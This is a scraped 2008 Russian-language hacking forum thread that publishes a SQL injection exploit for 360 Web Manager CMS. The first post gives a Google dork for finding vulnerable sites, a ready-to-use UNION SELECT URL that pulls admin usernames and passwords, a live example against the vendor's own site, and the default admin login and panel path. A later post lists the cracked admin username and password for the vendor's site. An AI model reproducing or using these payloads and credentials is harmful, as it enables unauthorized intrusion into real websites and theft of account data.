Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS 360 Web Manager CMS Remote SQL Injection Vulnerability

   

Опции темы

Поиск в этой теме

Опции просмотра

360 Web Manager CMS Remote SQL Injection Vulnerability   #1   20.01.2008, 08:48 Ded MustD!e Members of Antichat - Level 5 Регистрация: 23.08.2007 Сообщений: 417 Провел на форуме: 14324684 Репутация: 3908 360 Web Manager CMS Remote SQL Injection Vulnerability 360 Web Manager CMS Remote SQL Injection Vulnerability Author: Ded MustD!e Site: http://www.360webmanager.com/ Google Dork: inurl:"IDFM=" "form.php" Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+u ser/* Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+u ser/* =))) Details: количество колонок может варьироваться, логин админа всегда "superadmin", админка - http://www.site.com/adm/login.php Добавил на milw0rm: http://www.milw0rm.com/exploits/4944 Последний раз редактировалось Ded MustD!e; 21.01.2008 в 08:16..   Ded MustD!e Посмотреть профиль Репутация Отправить личное сообщение для Ded MustD!e Найти все сообщения от Ded MustD!e Добавить в друзья   #2   20.01.2008, 09:50 Nightmarе Познавший АНТИЧАТ Регистрация: 29.04.2007 Сообщений: 1,189 Провел на форуме: 5749763 Репутация: 1680 Замечательно!   Nightmarе Посмотреть профиль Репутация Отправить личное сообщение для Nightmarе Посетить домашнюю страницу Nightmarе Найти все сообщения от Nightmarе Добавить в друзья   #3   20.01.2008, 09:55 Nightmarе Познавший АНТИЧАТ Регистрация: 29.04.2007 Сообщений: 1,189 Провел на форуме: 5749763 Репутация: 1680 Хотя у меня что на официальном сайте пишет: Table 'webmanag_data.u' doesn't exist Что на другом Table 'блаблабла' doesn't exist Но то что официальный сайт поимели это вобще лол!!!!!!!!!!!   Nightmarе Посмотреть профиль Репутация Отправить личное сообщение для Nightmarе Посетить домашнюю страницу Nightmarе Найти все сообщения от Nightmarе Добавить в друзья   #4   20.01.2008, 13:14 Ded MustD!e Members of Antichat - Level 5 Регистрация: 23.08.2007 Сообщений: 417 Провел на форуме: 14324684 Репутация: 3908 Цитата: Сообщение от Nightmarе   Хотя у меня что на официальном сайте пишет: Table 'webmanag_data.u' doesn't exist Что на другом Table 'блаблабла' doesn't exist Но то что официальный сайт поимели это вобще лол!!!!!!!!!!! когда копируешь, пробелы бывает получаются, ты просто пробел из ссылки не убрал, у тебя +from+u%20ser получается, тогда он так и пишет=)))   Ded MustD!e Посмотреть профиль Репутация Отправить личное сообщение для Ded MustD!e Найти все сообщения от Ded MustD!e Добавить в друзья   #5   20.01.2008, 18:43 Ded MustD!e Members of Antichat - Level 5 Регистрация: 23.08.2007 Сообщений: 417 Провел на форуме: 14324684 Репутация: 3908 В теме "Расшифровка хэшей" расшифровали хэш к сайту. Теперь можно войти в админку официалки=))))) http://www.360webmanager.com/adm/ login: superadmin pass: 1320webx   Ded MustD!e Посмотреть профиль Репутация Отправить личное сообщение для Ded MustD!e Найти все сообщения от Ded MustD!e Добавить в друзья

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости     Статьи         Авторские статьи         Чужие Статьи Безопасность и Уязвимости     Избранное     Уязвимости         Сценарии/CMF/СMS         Форумы         Расшифровка хешей         E-Mail         ICQ         Чаты     Безопасность         *nix         Soft - *nix         Windows         Soft - Windows         Анонимность         АнтиАдмин         Защита ОС: вирусы, антивирусы, файрволы.     Электроника и Фрикинг         Новости мира "железа"         Сотовый фрикинг         Аппаратное обеспечение         Схемы и программы         Телефония и связь         Беспроводные технологии/WPAN/WLAN     Администрирование         *nix системы         Windows системы         AntiDDos - АнтиДДОС     Проверка на уязвимости Программирование     PHP, PERL, MySQL, JavaScript         ПО для Web разработчика     С/С++, C#, Delphi, .NET, Asm     Реверсинг SЕО/Финансовые задачи/Социальные сети     SЕО - тонкости, методы раскрутки         Партнерки         Услуги, Покупка и Продажа в SEO         Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.         Белые методы раскрутки         Черные методы раскрутки         Обсуждение Ваших сайтов         Статьи     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Инвайты, mails, базы - Покупка, продажа         Доступы, shells, ftp - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, лоады, инсталлы, загрузки - Покупка, продажа         О Работе         Покупка, продажа, услуги в Соц. Сетях         ICQ - Покупка, продажа     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Хостинги - Hostings Оффтоп     Болталка     Forum for discussion of ANTICHAT     Квесты         Antichat's Quest Antichat     Правила форума     Новости форума     Video.Antichat         Комментарии к видео